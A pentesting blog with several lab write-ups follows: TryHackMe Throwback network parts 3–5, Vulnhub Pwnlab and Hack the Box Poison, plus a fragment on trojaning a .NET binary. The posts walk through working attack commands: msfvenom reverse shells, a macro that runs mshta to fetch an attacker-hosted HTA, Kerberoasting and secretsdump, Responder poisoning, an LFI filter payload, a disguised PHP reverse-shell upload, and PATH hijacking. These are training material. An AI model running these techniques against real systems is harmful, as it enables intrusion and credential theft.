If we have access to overwrite an existing .NET binary with a modified one, there are a variety of other useful things that could be added. In many cases this would require administrative rights to access the original’s location on disk, i.e. C:\Program Files, but it’s not abnormal to compromise a machine and find more interesting things to do with it during post-exploitation.

I’m not going to detail anymore in this post, but I will list two potential ideas that could be done with this specific app and there are countless others for other applications depending on their functionality and purpose. I haven’t tested either of these personally, but they should work in theory:

  • (Exfiltration) Have the application perform an HTTP request with the submitted password to the attacker’s external server
    • This would avoid needing to write the log file to disk
  • (Credentials) Have the application try to connect to the attacker’s SMB server that is running Responder
    • As the application would likely be running as the current user, this should provide a Net-NTLMv2 hash that can either be cracked or passed to another machine.

TryHackMe – Throwback Network (Part 5 – Corporate.local and TBSEC-DC01)

When we left off last time we had just validated our current domain admin, MercerH, is also able to log into CORP-DC01 as an administrator. I stuck with using RDP to log in for this portion.

Looking around the machine doesn’t find anything useful in mercerh’s profile, but a file named “server_update.txt” in the Administrator’s Document’s folder is interesting. The notice appears to be a message notifying team members about two web pages that are hosted on 10.200.14.232 (in my case): mail.corporate.local and breachgtfo.local. There is also a reminder to not link social media or github to company resources, which might indicate something sensitive had been found there in the past.

I edited my hosts file (/etc/hosts) to include these two entries and tried accessing them through my browser using the proxychains configuration in FoxyProxy.

Visiting the pages gives us a login page for Corporate webmail.

And a site that appears to function like haveibeenpwned.com where you can search for an e-mail to see if it has been compromised.

I tried a few of our previously discovered credentials on the webmail login with no luck, so we’ll likely have to wait to poke further at that. The e-mail addresses we already have also don’t seem to have any breaches associated with them as they come back with “No Breaches Found”.

As it doesn’t seem like the e-mail addresses we have work for either of these sites, let’s explore the other part of the message we found that mentioned social media. The text file from earlier had a reminder not to link company resources to github or social media, so let’s see if we can find any of those online. Starting with a simple Google Dork to only give results from LinkedIn, we get some hits for the company.

Looking further into that result, we see LinkedIn shows 3 employees for this company: Rikka Foxx, Summer Winters, and Jon Stewart,

I looked through each of these pages, but the one that stood out as interesting was Rikka Foxx. She is listed as the lead developer for the company, so if anyone was going to have a github repository it would likely be her.

I didn’t get any results on Github when using Google dorks again, but searching on github.com directly for “throwback hacks” gives us 1 user result.

Looking at the repos this user has listed, we can see one appears to be for the Timekeep server in use within the company that we’ve already been through.

Checking the commits for this project shows standard entries for adding each file, but there is also a second commit mentioning an update to db_connect.php, a file that sounds like it would potentially have database credentials in it.

Inspecting that commit specifically, we can see the user removed hard-coded credentials for DaviesJ. It looks like this is one of the credentials we had already found from other places, but maybe we can try them against the new device we identified in this domain, CORP-ADT01.

CORP-ADT01 (10.200.x.243)

I can’t reach CORP-ADT01 through my current route setup in Metasploit, so I have to repeat the process of creating a file with msfvenom, creating a matching listener in Metasploit, uploading/running the file on a device that can reach our target (CORP-DC01 in this case), and then using the session it creates to create a new route. I won’t show screenshots of these steps again as I’ve done it a few times, but we end up with a session in Metasploit that can reach the CORP-ADT01 machine and it looks like the credentials we found will give us administrator access.

I looked around the machine for a bit and only found one interesting file. The image below is an e-mail explaining how the e-mail format being used for mail.corporate.local will be changing.

This is important for us as we already have a list of users for the domain, but don’t necessarily know which department everyone would be in. Trying the base e-mail domain or the domain with a wildcard on the gtfobreach site doesn’t give any results, so it looks like we’ll need a full e-mail to check. We can make the check a little quicker by just adding all 5 prefixes listed in this text file to every user we’ve identified so far and write a quick script to check them against the breach site.

The walkthrough for the network uses a tool called LeetLinked to scrape LinkedIn for any profiles associated with a specific company or domain. In our case, the command below checks for any accounts listed with the throwback.local e-mail domain and the company name of “Throwback Hacks”.

python3 leetlinked.py -e "throwback.local" -f 1 "Throwback Hacks"

Once this is run, it outputs a spreadsheet with the results. These results give us a starting point for e-mails to check for breaches.

However, before we can check for breaches, we need to convert these e-mails to the new format that is expected on mail.corporate.local and mentioned in the e-mail update above. There are scripts that can do this for you, but however you do it, you should end up with a list like below, containing every user we found with LeetLinked, but using the new format for every department as we don’t know which user goes with which department. The @ symbol in the e-mail needs to be replaced with the URL-encoded version of it (%40) for the script I’m going to use to work correctly.

I wrote a quick Python script to go through each e-mail in this file and make an HTTP request against the breach site, matching the format of the request to what we see happen when searching in the browser.

The script simply prints out the e-mail being checked and the length of the HTTP response. 4950 is the normal length of a message giving the response of “No breaches found”, so anything other than that number indicates something we should look into. As the script finishes up, we find one e-mail that generates a response length that differs from the norm: SEC-jstewart@TBHSecurity.com.

Checking this e-mail manually for breaches shows us the results and provides a password.

Moving back to mail.corporate.local and trying this e-mail/password combination let’s us in and we find one e-mail waiting. The site appears to mimic Outlook 365, but seems to just be a clone to look like it and isn’t interactive, displaying only this one message with guest credentials for TBSEC_GUEST.

TBSEC-DC01 (10.200.x.79)

At this point, the last step is to compromise the last machine in the network with these credentials: TBSEC-DC01 (the last domain controller). However, the walkthrough on TryHackMe doesn’t explain how you would have identified there was another DC if their network map didn’t already show it. This might have been something I missed, but I wasn’t able to find a link to it from the two domains we have already been through via trusts, ARP tables, or anything.

Moving on, I was able to RDP into the machine with the guest credentials.

Looking at the users in the domain, we identify one that appears to also be a local administrator on this DC: TBService.

Going through the AD properties of this user shows it has an SPN (Service Principal Name) set, so we can try Kerberoasting it to try and get its password.

I went back to using Impacket for this portion, but there are other tools that do the same thing, like Rubeus. The command below uses our working credentials to request a ticket for any accounts with SPNs set in the domain. Once run, we can see we successfully get the hash for the TBService user.

proxychains python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -dc-ip 10.200.14.79 TBSEC_GUEST:"WelcomeTBSEC1!" -request

Back to Hashcat, using the same hash type as our last Kerberos hash (13100), and we get a successful crack for the password “securityadmin284650”.

And finally, back on TBSEC-DC01, we’re able to successfully connect as the TBService user to get administrative rights on the machine, successfully owning the last machine in the network.

I poked around a little on this machine to see if I can go back and find a way that we were supposed to have identified TBSEC-DC01 without using the walkthrough, but still didn’t see anything.

Finishing Up

So that’s the end of this network and this series of posts. Overall, I enjoyed it and learned a few things along the way. The only cons I’d call out are the way the walkthrough glazes over how someone would identify certain targets in a real-world situation where they’re not conveniently provided a network map ahead of time. However, given this is the first network of this type TryHackMe has released, I think Sq00ky and Cryillic did a great job of connecting everything all the way through to create a logical attack path.

Here’s the final network map after everything was completed.

TryHackMe – Throwback Network (Part 4 – TIME and DC01)

At the end of the last post we had taken over Throwback-TIME and dumped the hashes. Now we need to do some more recon on that machine to see if there is anything of interest. Before we do that, I tried to crack the hash for the “Timekeeper” user as that didn’t seem standard. Using hashcat again with mode 1000 for NTLM and the rockyou wordlist we were able to crack it.

hashcat.exe -a 0 -m 1000 ..\hash.txt ..\rockyou.txt

We can test the credentials by trying to SSH into the Throwback-TIME machine through proxychains (using the route setup in Metasploit from last time).

Now, we can continue looking around the machine. Using netstat, we can get a list of ports the machine is listening on and one stands out that we didn’t see before: port 3306 (MySQL) appears to be listening.

We can also see that there is an xampp directory in the root directory for the C drive, so the MySQL instance running is likely part of that. As XAMPP needs a way to manage the MySQL database it uses, it includes binaries in its directory, such as C:\xampp\mysql\bin\mysql.exe which will let us connect directly to the database (assuming we have credentials). I ran into a problem at this point when my SSH connection died and wouldn’t let me re-connect, so I switched to using RDP instead. I can the administrator hash we dumped to connect via WinRM and use that shell to add the timekeeper user to the Remote Desktop Users group using the following command.

net localgroup "Remote Desktop Users" timekeeper /add

After this, I can use xfreerdp to connect to the machine as the Timekeeper user.

When I try to connect to MySQL, however, we find the password we have for Timekeeper doesn’t work.

Going back to our enumeration of domain users, I remember seeing a user named SQLService, which might have the credentials we need for this database. Many times these SQLService accounts will have an SPN (Service Principal Name) set to associate it with a certain SQL server running and these SPNs can allow us to Kerberoast the account to try and gather its password hash. Using a previous session with PowerView still loaded, we can see this account does have an SPN set.

I’m not going to go into detail about how Kerberoasting works, but in this case I’m going to use the Impacket toolkit again to do it using the “GetUserSPNs.py” script. The command below just needs us to specify valid credentials for any user in the domain, specify the domain controller, and tell it to request a ticket on behalf of any users found.

proxychains python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py throwback.local/blairej:7eQgx6YzxgG3vC45t5k9 -dc-ip 10.200.14.117 -no-pass -request

We can see in the image below that it successfully finds the same SPN we saw earlier and then provides us a hash of the Kerberos ticket for the user.

Now, as usual, we just need to pass it over to hashcat to try and crack it. We identify the hash type as 13100 using the hashcat example hashes page again. Then run it and find it cracks almost immediately with the password “mysql337570”.

If we go back to our RDP session and try logging into MySQL one more time using this new password we’re able to get in now. Now let’s enumerate what’s in the database.

Looking at the available databases, we see two of potential interest: domain_users and timekeepusers. Looking at domain_users first shows it only has one table named “users”.

Checking the content of that table gives us a list of usernames that we haven’t seen before in our enumeration, so possibly users from another domain.

Looking at the timekeepusers database shows the same single table “users”, but gives us a list of users along with passwords.

Throwback-DC01

With this new information we can turn our focus on attacking the domain controller itself. We know its IP is 10.200.14.117, so let’s try password spraying with some of these new passwords we found combined with our previous list.

After a little bit, we get a hit on the user JeffersD being able to log into the DC with the password “Throwback2020”.

For simplicity, I used RDP to try the credentials and they successfully give us a session on the domain controller.

Looking at the local administrators for the machine, we can see that our account is not one, but the user MercerH appears to be, which might be useful later.

A little more enumeration of our user’s folders reveals a document named “backup_notice.txt” in the Documents folder that has credentials for the backup account.

Given that in order for an account to successfully backup a server, it would need sufficient privileges to do so, we can assume the backup account likely has access to dump certain information from the domain controller. It might not be able to log in as an administrator, but we can try using another Impacket script called “secretsdump.py” to remotely dump the domain hashes using the backup credentials.

proxychains python3 /usr/share/doc/python3-impacket/examples/secretsdump.py backup:"TBH_Backup2348!"@10.200.14.117 -dc-ip 10.200.
14.117

And it successfully dumped the hashes for all users in the Throwback.local domain, which means we essentially own this domain now. For ease of use and so we don’t have to try and pass the hashes whenever we need them, I copied over just the NTLM portion of each user’s hash to try and crack with Hashcat. Most of the successful cracks were for passwords we already knew about, but “pikapikachu7” was the password for the user MercerH, who happens to be an administrator on the DC.

As my SSH is still being weird and won’t let me connect, RDP again it is. We can see that I’m able to successfully connect using mercerh’s credentials to the domain controller, which means we now have an interactive session with domain admin rights.

We could use the built-in Windows Server AD tools to poke around since we’re in an RDP session, but I prefer PowerView for this portion. I loaded it from my local machine into memory in the RDP session and checked for other domains in the forests, along with any domain trusts our current domain may have with them.

This output tells us there is a second domain named “corporate.local”, which we have a bidirectional trust with, and the main domain controller appears to have the hostname “CORP-DC01”.

We can do a few more enumeration searches for users and computers.

We get a list of users that seems to match the domain_users table we saw in the MySQL database and only two computers in the domain: CORP-DC01 and CORP-ADT01. A quick ping shows the names can be resolved and gives us the IPs of the machines.

Pivoting to Corporate.local domain

I tried to run crackmapexec against CORP-DC01 to verify if I could reach it, but it doesn’t appear that my current route through Throwback-PROD allows me to as it times out rather than just denying, so we’ll need to set up a new session in Metasploit and create a route going through Throwback-DC01 instead.

First, I created a new file with msfvenom to move over to my session on the DC.

msfvenom -p windows/meterpreter/reverse_tcp lhost=tun0 lport=9999 -f exe -o shell-dc.exe

After transferring the file over and running it, I have a new session in Metasploit for the DC.

I then went back to the autoroute module and used the “delete” cmd setting to remove the current route going through Throwback-PROD. There are some errors that show up, but the ending route command shows we have no current routes set.

Switching the command back to “autoadd” and changing the session to our new one of the DC, running it gives us similar errors, but also shows we now have a new route defined going through Throwback-DC01.

Checking crackmapexec again, we can see this time it successfully connects, but then gives us an explicit logon failure message, so our new route appears to be working.

As we have a bidirectional trust, we should be able to authenticate to the corporate.local DC using an account from the throwback.local domain, such as the one we’re currently using: mercerh. Crackmapexec failed above because it defaulted to using the corporate domain, but when specifying throwback.local, it successfully connects. It even gives the message “Pwn3d” at the end, indicating our user is an administrator.

I’ll end this post here for now and with the next one we’ll move into looking around the Corporate.local network. Here is the current state of the network and new machines we have owned.

Until next time again!

TryHackMe – Throwback Network (Part 3 – PROD and TIME)

Picking up where we left off, we were able to perform some domain recon from the Throwback-WS01 machine and confirm that there are 4 total computers that are part of the throwback.local domain:

  • Throwback-PROD
  • Throwback-MAIL
  • Throwback-TIME
  • Throwback-DC01

We knew about three of these already, but TIME was new to the list. However, the problem is we can only access PROD and MAIL with our current VPN connection due to the firewall configuration, but can include WS-01 as well if we send another phishing e-mail out to the users and setup a persistence mechanism on it if the executable is run again.

As sending multiple phishing messages to the users would start to seem suspicious in a real environment, we need to look around for other methods of gaining a reliable foothold. In a real corporate network, one of the easiest way of collecting credentials can be through abusing NBT-NS/LLMNR poisoning. If a client cannot resolve the name of a workstation or device through DNS it will fall back to name resolution via LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service). The tool we’re going to use for this is called Responder. At a basic level, it will perform the two steps below:

  1. First, it will listen to multicast NR (Name Request) queries (LLMNR – UDP/5355, NBT-NS – UDP/137) and, under the right conditions, spoof a response – directing the victim to our attacker machine instead of the intended device.
  2. Once a victim tries to connect to our machine, Responder will exploit the connection to steal the user’s username and password hash.

To get started, we run Responder.py and provide the interface we want it to listen on. The settings for which type of poisoners/servers to use are controlled through the /usr/share/responder/Responder.conf file, but we’ll use the default configuration for now.

Once started, we can see it is listening on all three name resolution services, along with running fake servers on multiple protocols. After a few minutes, we get a hit from 10.200.14.219 (Throwback-PROD) with the NTLMv2 hash for the user PetersJ.

Now that we have a hash, we can try to crack it with Hashcat, but we need to find out which mode to use for this type of hash. A quick Google search for “hashcat example hashes” gives us their page with a list of every hash type they support, the mode number, and an example of what they look like. Searching for NTLMv2 shows us that is is mode 5600 and the example hash looks to be in the same format as the one we collected.

I tried just using the default rockyou.txt wordlist first, but it didn’t find anything, so I used the OneRuleToRuleThemAll rule list again and it found the password below: Throwback317.

hashcat.exe -a 0 -m 5600 ..\hash.txt ..\rockyou.txt -r rules/OneRuleToRuleThemAll.rule

Great, so we now have a set of supposedly valid credentials for Throwback-PROD, which is one of the three devices we can access from “outside” the network. Going back to our original nmap scan, we saw SSH was listening on 10.200.14.219, so that will be the easiest method of testing the credentials.

Looks like it works, so now we have easy access to Throwback-PROD. Unfortunately, the user account we connect with isn’t a local administrator this time, but there does seem to be a second account for PetersJ that is an admin (along with BlaireJ who we might be able to pass the hash for from WS-01 if needed).

We need to find a way to escalate our privileges on the machine to administrator before we can move any further. My tool of choice for enumerating this type of information is winPEAS, but SeatBelt is also a good choice, though I’ve found its output to be a bit lengthy. I moved to the AppData temp folder where we’ll have write permissions and downloaded the winPEAS.exe file from my local machine with a quick powershell command.

When run, winPEAS gives nice color-coded output (depending on the type of shell you have) and helps us identify misconfigured services, passwords stored in clear-text, or other common methods that can be used to escalate privileges.

One of the first interesting bits we find is stored autologon credentials for the user BlaireJ.

Trying to SSH in with those credentials now verifies they work.

As BlaireJ is a local administrator on PROD, we can go ahead and use this session to dump the rest of the credentials on the machine, but first I want to transfer the session to Metasploit for easier access to Mimikatz and so we can use it to pivot to the internal network later on.

First, I use msfvenom to create a file called “shell.exe” that, when run, will call back to a listener I will create in Metasploit.

Next, I downloaded the created file using powershell into the C:\windows\temp folder on PROD.

Lastly, I start a listener in Metasploit using the same payload as was used to create shell.exe and then run the file on the machine. It launches and we can see we successfully get a meterpreter shell back in the Metasploit console.

To emphasize the dangers of having access to a local admin and the ease of use Metasploit gives us, the screenshot below shows the one command it takes, ‘getsystem’, to go from our current user to NT Authority\SYSTEM if our user is already a local administrator.

Now that I have SYSTEM access, after migrating to a x64 process (our initial payload was only x86) I’m able to dump hashes for the local machine.

Checking for domain credentials using the kiwi module doesn’t show us anything we don’t already have. We get the domain NTLM hashes for BlaireJ and PetersJ, along with the plain-text password for BlaireJ, all of which we already have unfortunately.

I poked around the various user folders on the machine, but didn’t find anything too interesting. However, now that we have a session on PROD we can use it to pivot into the rest of the internal network. The easiest way to do this is to use Metasploit’s “autoroute” and “socks4a proxy server” modules.

To configure the route, we need to use the multi/manage/autoroute module, point it to the session we want to use, and the assign the subnet we route to route traffic for. In this case, we want any traffic destined for the 10.200.14.0/24 subnet to be routed through session 1, which is what the final ‘route’ command shows below.

After the route is configured, we need to use the Socks4a proxy server module to allow us to access the route outside of Metaploit. This module starts a proxy server on all port 1080 for all interfaces on our local machine.

Lastly, we add the line below to our /etc/proxychains.conf file to configure the type of proxy to use, the address to point it to, and the port to connect over.

With all of these steps done, we can now use the proxychains tool to force certain traffic through our Metasploit session, allowing us access to any devices the Throwback-PROD machine has access to.

If we test nmap against port 445 of Throwback-WS01, we can see our first result comes back as filtered, indicating there’s a firewall blocking our scan. When we add proxychains to the beginning of the command and add the -sT flag for a full connect scan (due to how scanning through a proxy works), the port comes back as being open.

Normal Nmap
--------------------
nmap -p 445 10.200.14.222 -Pn -n

Nmap with Proxychains
--------------------
proxychains nmap -sT -p 445 10.200.14.222 -Pn -n

Perfect, now we can access the rest of the devices in the throwback.local domain. Let’s run a quick nmap scan against the two we haven’t been able to look at yet: Throwback-TIME and Throwback-DC01. The scan takes some time to complete, but we can already see that it seems to be working and has identified a few common ports open on both machines.

As they both appear to be listening on port 80 (HTTP) and the entire scan will take a while, we should start checking out the web servers. However, we run into a problem when trying to access the internal network via a web browser in that it is not going through the proxy we have configured. We can fix this by configuring a proxy in the browser itself. In my case, I use a Firefox add-on called FoxyProxy that lets you configure multiple proxies and switch between them easily. In the configuration I define this one as a SOCKS4 to match what is being used in Metasploit and point it to the same IP and port we use with proxychains.

Next, I just switch to the “Proxychains” choice I just created to enable that proxy. Now any website I visit will go through this proxy server as well.

When we try visiting 10.200.14.176 in the browser now we get a login page for what appears to be a timekeeping web application.

Unfortunately, when we try using the credentials we have already found for BlaireJ or PetersJ, neither work, so this system doesn’t appear to be using domain credentials. If we remember back to the e-mails we found on the webmail portal earlier, there was a message to MurphyF for a password reset that used an address for timekeep.throwback.local.

As we seem to have found the server hosting that site now, we can try using the URL to reset the user’s password. In this case, I will be using the URL below, which should set MurphyF’s password to the word ‘password’.

  • 10.200.14.176/dev/passwordreset.php?user=murphyf&password=password

When submitting the request, we get a page saying the password has been successfully updated along with a flag.

Going back to the login page, we’re now able to login to the site.

The Help & Support option doesn’t do anything, but “Upload time Card” takes us to another page where it seems to want a user to upload an Excel document named “Timesheet.xlsm”.

My first thought was to try uploading a PHP web shell file, but it gets rejected as the site only seems to accept XLSM files.

Since it doesn’t seem like there’s a way around the file type restriction (I didn’t try too hard, so I’m not positive there isn’t), let’s try another tactic. As this network has simulated user behavior in other parts, maybe there is some here as well. Let’s try making a malicious Excel document that will call back to our machine to give us a reverse shell.

First, I’m going to use the ‘hta_server’ module in Metasploit to create a malicious HTA (HTML Application) file and host it for us. We set the correct listening interface for the server and payload then run it to get the URL for the malicious file. This module also starts a Metasploit listener, so we don’t have to worry about starting one of those separately.

Now, we move over to a new Excel document named Timesheet.xlsm (to match what the website expects and add a macro. For reference, I did this in Excel, but you may be able to do something similar in free products like OpenOffice or LibreOffce. I’ve always had problems working with macros that work in both products, but I’m sure there’s a way.

First off we open the document, go to the Developer tab, and click the ‘Macros’ button. If the Developer tab isn’t visible, you may need to enable it first.

Next, we create a new module in the VBA editor to insert our malicious code into. I’m using something basic that just runs a shell command and tries to execute a remote HTA file. The “NotMalicious” function in the code below defines the code to be run when the function is called and “Auto_Open()” defines which functions should be called automatically when the document opens. In our case, we only have one function that will use mshta.exe to try and execute the HTA file being hosted in Metasploit.

mshta.exe http://10.50.12.12:8080/<Metasploit URL>

With the document created, I went back to the web site, uploaded our malicious Timesheet.xlsm, and this time it appears to have worked successfully. The message even says someone will review the timesheet soon, so we just need to wait for someone to open it.

After a minute or so we got a connection back from 10.200.14.176 (Throwback-TIME) and a shell as the Administrator user was opened.

Using the same ‘getsystem’ command as earlier to escalate our privileges to SYSTEM and then migrating to a x64 process, we can now dump the hashes from this machine as well. These hashes look mostly standard, except for the Timekeeper account, which appears to be local to this machine.

I’m going to wrap this post up here for now. In the next one we’ll poke around Throwback-TIME a little more and then move on to taking over the domain controller.

Here’s an updated network map of which devices we currently own and what else we can see.

Until next time!

Vulnhub – Pwnlab: init

Annndddd I’m back. I’ve been busy for the past 1.5 months or so working through the lab machines for the OSCP and will be taking that exam in two weeks. However, I wanted to go back to some of the “OSCP-like” Vulnhub machines listed here for some final preparation outside of the machines provided in the lab range. It might be a separate post altogether eventually, but I have really enjoyed the OSCP material so far. It only took a few days to get through the PDF and videos provided, but the machines in the labs have been great, if a little out of date in places (looking at you Windows Server 2000).

Today I picked the “Pwnlab: init” machine from Vulnhub as it’s supposed to be similar to what is seen on the OSCP. Anyway, let’s get started.

The initial nmap scan for all ports shows 4 ports open: HTTP, 2 for RPC, and MySQL. As RPC isn’t usually very fruitful on it’s on and MySQL will likely require credentials, we’ve save these for later and check out what’s running on the web server.

The initial splash page says the server is used to upload and share images inside the intranet and has links to pages for Login and Upload.

Clicking through these, we get a standard login page and the upload page states we need to be logged in to be able to use it.

One thing I noticed while looking over these pages is how they seem to be loaded. The page itself seems to stay on / (likely /index or /index.php) and loads the different pages through the parameter “page”.

To check the logic, I tried visiting /login.php and it loads the same page as seen when clicking the Login link on the home page, minus the header with links to other pages. This appears to indicate that the ‘page’ parameter is looking for files with a given name in a directory, appending .php to them, and rendering the content.

While exploring the website, I also started a gobuster session to try and find any hidden directories or files. It came back with the expected list of pages, plus one for config.php. Both /config.php and ?/page=config load a blank page, which likely means that the only content in the file is PHP code, which won’t be rendered on the page. Given that the site has a login page and we saw MySQL running on the server, my guess is that this file contains connection information and possibly credentials for the SQL database.

Now we just need to find a way to read the contents of config.php. Enter php://filter and its ability to convert a file’s content to base64 and display it, including that which wouldn’t normally show on a website (such as the underlying php code). To test this out we pass the value below to the page parameter and give resource the file we want to convert to base64.

/?page=php://filter/convert.base64-encode/resource={file to read}

My first test was on the login.php page and it looks like there is a successful LFI (Local File Inclusion) that allows us to successfully get base64 returned where the page would have rendered before. I intercepted the request with Burp Suite to make it easier to modify and send again, then sent the same request one more time.

Cool, we have some base64, but now we need to decode it. Luckily, Burp also has a Decoder we can paste the string into and choose to decode as base64.

After doing this, we see what appears to be the php code used to build the login.php page. Success! Now that we know this works, just in case we need them, I repeated the process for the other files we know exist: index.php, upload.php, and config.php. Checking config.php, we see it does in fact have credentials for the MySQL server.

I used these credentials to connect to the database from my machine. Looking through the database, we see there is only one non-standard database, Users, and only one table within it, users. Dumping the content of this table reveals usernames and passwords (base64 encoded) for three users: kent, mike, and kane.

I took the first decoded credentials in the list for kent, and was able to login to the site successfully. Now we get an option to upload a file, so the next step will be trying to get a PHP payload to be executed by the server and create a reverse shell.

When I try to upload a .php file used for a reverse shell, it gets rejected stating the extension is not allowed.

I tried again, just uploading a legitimate PNG image this time. It uploaded successfully and rendered the image on the same page automatically. I also checked the page info for the image and it showed the image being stored in the /uploads directory, with a name that appears to be a hash of the file. Manually visiting /uploads shows an open directory of all files that have been uploaded, which at this point is just our one image.

Conveniently, we retrieved the contents of upload.php earlier when exploiting the LFI and can use it to see the logic behind the file upload functionality. When inspecting the code, it appears to go through four different checks before allowing a file to be uploaded.

-File extension is in the allowed list: .jpg, .jpeg, .gif, .png
-File type is an "image"
-File mime-type is an image matching the extensions above
-Lastly, the file type can only have one slash.  For example, something like "image/gif/application/x-php" couldn't be used

After looking at these restrictions, it looks like we should be able to upload our PHP file as long as the extension is in the whitelist and the file type is an approved image. I took the same php-reverse-shell.php file as before (named rev.php here for simplicity) and started by adding the magic byte for a GIF image at the start. This allows me to keep the rest of the PHP content, but the file will be indentified as an image. This isn’t stricly necessary as we can change the file type when we intercept the request with Burp in the next step, but it’s still good to know it works.

Next, I uploaded rev.php and intecepted the request in Burp. We can see the top portion of my reverse shell code and that the content-type is already set to “image/gif”, but we need to change the file name before forwarding the request. I changed the name to “rev.php.gif” to match the content-type, though it doesn’t really need to as long as it meets the whitelist requirements.

Success! The file was uploaded successfully and it tries to render the image on the page, but fails because it’s obviously just code and not a real image. However, there’s still a problem. When going back to the /uploads directory, we see our GIF and can view the file, but it doesn’t execute any code because it’s being treated as an image.

So, the file is on the server, but we can’t execute it by visiting the file directly. Luckily, in one of the other files we downloaded the code for earlier has a parameter we can use. The image below shows a comment in /index.php about how the ‘lang’ parameter would be used to set a cookie, but has not been implemented yet. The code for the potential implementation uses the the PHP function include(), which will allow us to execute code in a file if it is passed to the ‘Cookie’ parameter.

To execute our code, we intercept a request to /index.php, change the Cookie parameter to be “lang={path to malicious .gif file}”.

Unfortunately, we get an error when trying this because I mis-typed the IP address for my Kali machine in rev.php. My bad.

When fixing this, starting a netcat listener, and sending the request again, we get a successful reverse shell connection as the www-data user.

To start out, I transferred the privilege escalation checker linpeas.sh to the machine from mine using a Python web server, made it executable, and ran it.

This is a really nice script that checks common privilege escalation vectors, common misconfigurations, etc. and color codes them based on their usefulness. Unfortunately, it didn’t come back with anything very useful and neither did several other things I looked around at.

At this point, I remembered we found credentials for three users earlier and wanted to try them for the machine, but SSH wasn’t enabled. I was able to log in with kent’s credentials, but found nothing useful in his home directory and no interesting additional permissions. Mike’s credentials didn’t work, but kane’s did and he had an interesting file in his home directory named “msgmike” that was owned by mike.

The “msgmike” file is also set to be executable and when using hexdump on it we can see it’s calling cat on a file in Mike’s directory. Running the file shows the same thing, but gives an error that the text file it’s trying to read doesn’t exist. However, the script doesn’t appear to be using the fully qualified path for cat, i.e. /usr/bin/cat, which means we might be able to hijack the functionality by editing the PATH variable.

First, I created a new file in kane’s directory that simply calls /bin/bash to essentially open a new shell as whichever user runs it, then made it executable.

Next, we need to modify the path to have it check kane’s directory for our new cat file before it checks /usr/bin. After the change, we see it should read the PATH variable from left to right and check kane’s home directory before anything else, thus calling our version of cat when we run the msgmike file. Executing the file we see that it works and we are put into a new shell as the mike user.

Now that we can access mike’s directory, we see another interesting file named “msg2root” that appears to echo a string into /root/message.txt. A quick test shows that we can use this file to run multiple commands as root by terminating each with a semi-colon. The second image below shows us creating a test file in mike’s directory that is listed as being owned by root.

The way I ended up abusing this was by creating and compiling a file that just runs setuid(0), setgid(0), then runs bash as user ID 0 (root). Once the file had been transferred to mike’s directory, I called msg2root again and passed it commands to change the owner to root and then set it as an SUID file executable, allowing all users to run it as the file owner. Running it immediately puts us into a shell as root.

After doing it this way first, it occurred to me that there was a much simpler way of doing it without needing another file. After changing the path back to its original state, running the file and passing “;/bin/sh” puts us into a shell as root as well.

And that’s that. We have root access and can read the flag.

Recommendations:

  • The only real recommendation here would be to not leave developmental code on a production website if it is not properly implemented or at least leave it commented out so it is not potentially functional.
  • The rest of the box was fun, but not incredibly realistic so not much point making recommendations there.

Hack the Box #7 – Poison

This week’s machine was Poison from Hack the Box, a FreeBSD machine rated as medium. I don’t know much about FreeBSD, so it was interesting learning about some of the differences between it and more popular Linux versions. Also I got to practice SSH tunneling, so that was fun.

Running the initial nmap scan shows two ports open: ssh on 22 and http on 80. The additional information shows OpenSSH version 7.2 for FreeBSD from 2016 and a Google search for Apache 2.4.29 shows a release in late 2017. Both of these are pretty old at this point, so we’ll keep that in mind later if we don’t find an obvious exploit.

Initial nmap

Moving over to the browser to check out the web page, we find something that appears to be used for testing PHP scripts on the server. The sites listed to be tested look interesting, so let’s see if they’re in the root directory.

Home page on port 80

Each page loads successfully, with ini.php appearing to be some type of configuration file.

ini.php content

Info.php appears to be the result of running ‘uname -a’ on the server, listing kernel information.

info.php content

Listfiles.php shows an array of items, mostly matching the list of files to be tested on the home page. Of particular interest to us is the ‘pwdbackup.txt’ file that wasn’t listed before.

listfiles.php content
Viewing source of listfiles.php to make it easier to read

Before checking out the pwdbackup.txt file, I was curious what happened if I tried to search for something in the field on the home page. Based on the page below I noticed two things: 1) it’s adding my search term as a parameter in the URL which might be vulnerable to RFI/LFI/directory traversal and 2) it appears to be searching the current directory for a file matching the term I searched for (in this case ‘asda’).

Error shows server searching for local file matching our search term

I didn’t find much of value through #2 above, but the page did turn out to be vulnerable to a directory traversal, allowing me to view the /etc/passwd file on the server. However, the web server appeared to be running under a lower privileged account as I was not able to view more sensitive files such as /etc/shadow.

Local File Inclusion/Directory Traversal to view /etc/passwd

The passwd file was useful in that it gave us a list of users on the box, but I wasn’t able to view much else. On the other hand, when checking out /pwdbackup.txt we see what appears to be a password that has been encoded 13 times.

Contents of pwdbackup.txt
Viewing source of pwdbackup.txt to make it easier to read

The encoded string looks like regular base64, so a quick bash command to duplicate ‘| base64 -d’ 13 times, then piping the string to this reveals the decoded password.

Converting base64 encoded string 13 times to get a password

Looking at this password, and comparing it to the list of users we saw in /etc/passwd, we see a common name of ‘charix’. Assuming this password is for the user with the same name, I was able to ssh into the machine with that account.

Logging into ssh as ‘charix’

Success! With that we have access to the user flag.

Downloading ‘secret.zip’ file from charix’ home directory

It looks like the home directory for charix also has a file named ‘secret.zip’, which sounds interesting. I downloaded a copy of it with scp and unzipped it. It asked for a password, but it ended up using the same one as the charix user.

Contents of secret aren’t readable

Looking at the content of the secret file, it seems to be a binary that’s not readable. Not much to go on there, so let’s move on to see what else there is to find on the box that charix can see.

Active processes shows tightvnc running

Getting running processes with ps -aux shows an instance of tightvnc is running as root. Interesting.

Server listening on localhost ports 5801 and 5901, used for VNC

Using netstat, we can also see the box is listening on ports 5801 and 5901 on localhost, which are commonly used for VNC (5901) and VNC over HTTP (5801). This is likely our vector for privilege escalation, but the service is only available on the local machine, which means we’ll need to use some port forwarding to be able to access it.

SSH tunnel to access locally running services

I chose to do this through SSH tunneling using the command above to forward both 5801 and 5901 on the box to the matching ports on my machine.

Kali machine showing VNC ports listening through ssh

Running netstat on my machine afterward confirms we’re now listening on both ports for VNC. To confirm we can actually access the service, I modified the proxy settings in Firefox and tried to visit my localhost on these ports.

Firefox proxy settings to test ssh tunnel

5801 shows a “File Not Found” message, which doesn’t give us anything, but does at least prove it’s listening correctly as it didn’t give a “Page not found”.

Port 5801

Changing the proxy settings to 5901 and trying again gives the image below, which is standard for VNC, though I’m not sure what it means. Ok, so now we’ve confirmed we can successfully access the VNC service on the remote machine through our local ports. Now we can try to connect directly with VNC.

Port 5901

